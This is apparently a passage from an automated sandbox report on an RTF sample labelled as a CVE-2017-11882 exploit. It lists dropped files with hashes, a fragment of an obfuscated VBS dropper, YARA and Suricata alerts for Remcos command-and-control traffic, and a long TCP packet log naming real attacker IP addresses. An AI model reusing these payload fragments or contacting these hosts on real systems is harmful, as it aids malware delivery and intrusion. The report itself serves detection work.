                                                                                            Preview:L..................F.... .......r.......r....g......6@......................'....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....;Y.`..user.8......QK.X;Y.`*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.6@..;Y.` .SECURI~1.RTF..........WE..WE.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...2.2.7.5.9...7.3.8.8...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\172892\Users.user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf.Q.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...2.2.7.5.9...7.3.8.8...r.t.f.........:..,.LB.)...Ag...............1SP

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Generic INItialization configuration [folders]
                                                                                            Category:dropped
                                                                                            Size (bytes):143
                                                                                            Entropy (8bit):4.967340002873673
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:H9rbcK+JiMXelfLprXCm4P8bcK+JiMXelfLprXCv:H9rwKNHprNwKNHprc
                                                                                            MD5:F7ED7BD237F516102C09C512BF1E85F6
                                                                                            SHA1:13ABD893E079007C90DA4B892CF612B9CF609074
                                                                                            SHA-256:FFE9E1A49ABE3F351861CF487C0BB3084D551B2EC241807987A9565CF67922F0
                                                                                            SHA-512:FD4F1C0E114C1ED4AF77E2ECDE4EC4C7AD61170527176E9DCFC1AD8764E9E1FE5DFD3FA5E83B01D27309D096352456BD7DF429AF2F5A1F372CC5DDB17243D8CF
                                                                                            Malicious:false
                                                                                            Preview:[misc]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.LNK=0..[folders]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.LNK=0..

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):162
                                                                                            Entropy (8bit):2.5038355507075254
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:vrJlaCkWtVyDSK5RiuWElkY9ln:vdsCkWtaSArT9l
                                                                                            MD5:27999515AA910F0641A8B92A3F5A20F1
                                                                                            SHA1:931CD807A73D7D002033458FE922AD8AAA69B44E
                                                                                            SHA-256:506B38612CE35540B2B4646E0534176CF6481F90B7A6260FE308ACF1AF8D2DF7
                                                                                            SHA-512:5DAEC0A6CC939FF6C79B60734E4B5DCBB023A5D4E97EE317B1C2DB579F651D2AD4B32AF279F9C1A620A88285DDF9F4436F18FDC11421C84AEAA8CDF5FCD8014C
                                                                                            Malicious:false
                                                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                            C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS

                                                                                            Download File
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):207544
                                                                                            Entropy (8bit):3.8530934094159677
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:Uo4M7xayz1mE9/y/33+Fgt5p2GwKA6Tr0mduBbVXZ1mpt/k0B1rpYErnFrjP:Uo4M7Mo1mE9o3+RmduDy/k0vpYErn1P
                                                                                            MD5:8BD63BBD24B0B095F3FC481D42FE6205
                                                                                            SHA1:7FB55D0D9D571874C9310A89DB9D23537B43679C
                                                                                            SHA-256:06E9CC594AC61828036FEBA1C86C400BB90AFCDBEC0214C6A1F790EBF32BD615
                                                                                            SHA-512:8429218E158794B86CCB703B3DC41D02CB3E91021DF6F95FE2740DAD2A97B9A7CF2CDD338DF0456AA4E1E5B4393A7A4E968C79839B23F565FFD40A7608042F3B
                                                                                            Malicious:true
                                                                                            Preview:..i.L.i.k.L.L.U.P.A.L.s.b.x.b. .=. .".T.k.b.m.U.K.s.G.n.f.d.z.b.e.".....G.z.e.W.G.n.p.i.x.O.i.L.x.P. .=. .".f.t.K.W.Z.Q.d.L.K.i.N.i.H.n.".....Q.W.W.G.K.v.K.T.N.O.z.h.e.t. .=. .".C.L.Q.W.v.e.J.L.u.B.j.e.f.L.".....O.v.L.k.i.t.Q.O.N.u.G.m.J.K. .=. .".n.K.R.q.i.p.C.g.z.o.e.P.c.k.".....K.t.G.H.C.L.P.W.i.G.c.v.c.q. .=. .".L.L.k.c.G.K.L.L.q.L.q.x.m.U.".....k.c.u.U.m.e.W.x.W.l.s.W.h.P. .=. .".p.c.a.S.R.L.C.c.v.g.G.m.l.W.".....U.L.a.Z.C.k.Z.k.G.L.L.Z.h.q. .=. .".K.c.P.U.Q.i.p.c.q.W.L.q.L.W.".....c.c.c.i.G.o.O.G.n.R.e.h.e.m. .=. .".C.o.d.L.B.L.G.z.U.A.O.e.P.u.".....K.a.l.h.k.c.k.i.o.N.G.k.t.n. .=. .".Z.U.O.z.f.N.o.L.i.q.S.K.b.S.".....W.A.N.R.l.t.G.L.c.i.b.p.H.p. .=. .".L.u.K.t.e.k.b.W.o.G.J.t.L.d.".........k.q.l.O.A.h.L.b.i.C.G.i.G.u. .=. .".W.O.L.W.t.K.G.c.K.W.K.h.T.z.".....T.f.j.r.U.O.a.K.i.A.Q.x.U.a. .=. .".L.e.A.d.U.f.G.U.K.x.h.h.W.B.".....L.b.m.W.W.c.d.W.x.C.z.x.K.x. .=. .".P.P.B.r.W.f.H.i.e.T.n.H.f.G.".....L.W.Q.U.u.G.R.W.W.i.i.u.i.f. .=. .".C.K.A.t.m.a.L.Z.P.O.R.R.R.c.".....k.Z.K.P.u.K.x.

                                                                                            C:\Users\user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):47177
                                                                                            Entropy (8bit):5.2654505915034315
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:323b3W6CIIdbPyqPwB6Q+DtXreyhAZqCU:3SIIY9YbCXr2jU
                                                                                            MD5:5452A15639EA3D67FFE396CCDDE9D05B
                                                                                            SHA1:A9EF0BFF2AF15E45644E1AEF1DD23E5C62E15B80
                                                                                            SHA-256:5B4D0CC0FF5CBA3B30115B950E105562771930A2062F22494781390B4138384E
                                                                                            SHA-512:49914D15F6D0F75AA50012DA58D6A14E9F62E21AAA27AF031553121E9D1EEDD1C6C30E0E9FAD082B51060381CE124AD3C59C03E04EF1920DD2E890AC0937DF63
                                                                                            Malicious:true
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New

                                                                                            C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):162
                                                                                            Entropy (8bit):2.5038355507075254
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:vrJlaCkWtVyDSK5RiuWElkY9ln:vdsCkWtaSArT9l
                                                                                            MD5:27999515AA910F0641A8B92A3F5A20F1
                                                                                            SHA1:931CD807A73D7D002033458FE922AD8AAA69B44E
                                                                                            SHA-256:506B38612CE35540B2B4646E0534176CF6481F90B7A6260FE308ACF1AF8D2DF7
                                                                                            SHA-512:5DAEC0A6CC939FF6C79B60734E4B5DCBB023A5D4E97EE317B1C2DB579F651D2AD4B32AF279F9C1A620A88285DDF9F4436F18FDC11421C84AEAA8CDF5FCD8014C
                                                                                            Malicious:false
                                                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                            C:\Users\user\Desktop\~WRD0000.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):47177
                                                                                            Entropy (8bit):5.2654505915034315
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:323b3W6CIIdbPyqPwB6Q+DtXreyhAZqCU:3SIIY9YbCXr2jU
                                                                                            MD5:5452A15639EA3D67FFE396CCDDE9D05B
                                                                                            SHA1:A9EF0BFF2AF15E45644E1AEF1DD23E5C62E15B80
                                                                                            SHA-256:5B4D0CC0FF5CBA3B30115B950E105562771930A2062F22494781390B4138384E
                                                                                            SHA-512:49914D15F6D0F75AA50012DA58D6A14E9F62E21AAA27AF031553121E9D1EEDD1C6C30E0E9FAD082B51060381CE124AD3C59C03E04EF1920DD2E890AC0937DF63
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New

                                                                                            C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:Rich Text Format data, version 1
                                                                                            Entropy (8bit):2.655149566774923
                                                                                            TrID:
                                                                                            • Rich Text Format (5005/1) 55.56%
                                                                                            • Rich Text Format (4004/1) 44.44%
                                                                                            File name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
                                                                                            File size:81'974 bytes
                                                                                            MD5:5d0660bf632fd0fa66bc638775eb4b88
                                                                                            SHA1:f55a1c4a78252cc765f1747c321d0812ae0f9f38
                                                                                            SHA256:c3c93d712f93c4abe746760e31182f3cd5dfea00cb99176322f843ac20096697
                                                                                            SHA512:9847cad9018d7c01a1b5d4fb5c9a50b77523f5508605c5f8810bdaffef81b1b609eb41c8c5c8b6d5f0b59cf6832ab14a382c5f01470cacf87b759430fb325607
                                                                                            SSDEEP:384:ityaaa2XK5dRIc5izDPypf8vvv7VPYwnXqTJdeSIAmNvlYA6Jsy01tnGIdN:iMaaTCoeYkoPYwXWlIvlYlJ/01ZGQN
                                                                                            TLSH:8983DE4DE38F81A0CF556677521A4E8846FCB73EF20416B1746C837137ED92E44AA9BC
                                                                                            File Content Preview:{\rtf1.........{\*\lsdlockedexcept638582940 \]}.{\559463615@!59=7,.-:])?3()]#98^[2-%5.<;6.|.2#95*]_@%@:';&=?/>?1<_~??>_?/:>9??]%'^?2=6,.(?#:6!~/.%]$)8<!:.`?.4';(%1<+]<.-+&((,`.!9]7(3`^1%.^.?$|=#(@||./01??=9?01,%?/6>?1;=?$,.56%?+(5?/%*>@6=(_,1.~^.#?4`$&$+?

                                                                                            File Icon

                                                                                            Icon Hash:2764a3aaaeb7bdbf

                                                                                            Static RTF Info

                                                                                            Objects

                                                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                            0000012D5hno

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-09-27T14:00:18.336027+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.96443192.168.2.2249162TCP
                                                                                            2024-09-27T14:00:19.277462+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11185.235.137.22380192.168.2.2249163TCP
                                                                                            2024-09-27T14:00:19.277462+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11185.235.137.22380192.168.2.2249163TCP
                                                                                            2024-09-27T14:00:24.455225+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249164192.3.101.2914645TCP
                                                                                            2024-09-27T14:00:36.906135+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249165192.3.101.2914645TCP
                                                                                            2024-09-27T14:00:43.549242+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249166192.3.101.2914645TCP
                                                                                            2024-09-27T14:00:45.972234+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249167192.3.101.2914645TCP
                                                                                            2024-09-27T14:00:48.920848+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249168192.3.101.2914645TCP
                                                                                            2024-09-27T14:00:51.366389+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249169192.3.101.2914645TCP
                                                                                            2024-09-27T14:00:54.908881+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249170192.3.101.2914645TCP
                                                                                            2024-09-27T14:00:57.365279+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249171192.3.101.2914645TCP
                                                                                            2024-09-27T14:00:59.806039+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249172192.3.101.2914645TCP
                                                                                            2024-09-27T14:01:02.280898+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249173192.3.101.2914645TCP
                                                                                            2024-09-27T14:01:04.729676+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249174192.3.101.2914645TCP
                                                                                            2024-09-27T14:01:07.191649+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249175192.3.101.2914645TCP
                                                                                            2024-09-27T14:01:09.705313+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249176192.3.101.2914645TCP
                                                                                            2024-09-27T14:01:12.307814+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249177192.3.101.2914645TCP
                                                                                            2024-09-27T14:01:14.815580+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249178192.3.101.2914645TCP
                                                                                            2024-09-27T14:01:17.339635+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249179192.3.101.2914645TCP
                                                                                            2024-09-27T14:01:19.774757+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249180192.3.101.2914645TCP
                                                                                            2024-09-27T14:02:22.430608+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249181192.3.101.2914645TCP
                                                                                            2024-09-27T14:04:13.637193+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249182192.3.101.2914645TCP
                                                                                            2024-09-27T14:04:17.612389+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249183192.3.101.2914645TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Sep 27, 2024 14:00:12.066755056 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.071847916 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.071933031 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.072154045 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.077048063 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.695019960 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.695106983 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.695226908 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.695259094 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.695290089 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.695307970 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.695565939 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.695600986 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.695621014 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.695636988 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.695661068 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.695755005 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.696454048 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.696501970 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.696516991 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.696536064 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.696557999 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.696578979 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.697310925 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.697443008 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.700030088 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.700032949 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.700094938 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.700171947 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.700233936 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.700426102 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.700485945 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.783724070 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.783844948 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.783859968 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.783890009 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.783927917 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.784259081 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.784275055 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.784290075 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.784320116 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.784342051 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.785176039 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.785192966 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.785207987 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.785243988 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.785269976 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.786257982 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.786273956 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.786294937 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.786317110 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.786338091 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.786859989 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.786875963 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.786894083 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.786923885 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.786941051 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.787626982 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.787648916 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.787666082 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.787689924 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.787710905 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.788562059 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.788578033 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.788593054 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.788615942 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.788638115 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.789429903 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.789490938 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.866748095 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.866831064 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.866844893 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.866972923 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.867460012 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.872103930 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.872170925 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.872277975 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.872292995 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.872338057 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.872817993 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.872833967 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.872890949 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.873316050 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.873332024 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.873347044 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.873382092 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.873395920 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.874234915 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.874250889 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.874264956 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.874279976 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.874294043 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.874320030 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.875116110 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.875133991 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.875148058 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.875185013 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.875207901 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.876050949 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.876066923 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.876074076 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.876082897 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.876127005 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.876142979 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.876951933 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.876969099 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.876982927 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.877021074 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.877036095 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.877827883 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.877844095 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.877859116 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.877883911 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.877901077 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.878750086 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.878773928 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.878787994 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.878804922 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.878812075 CEST4916180192.168.2.22185.235.137.223
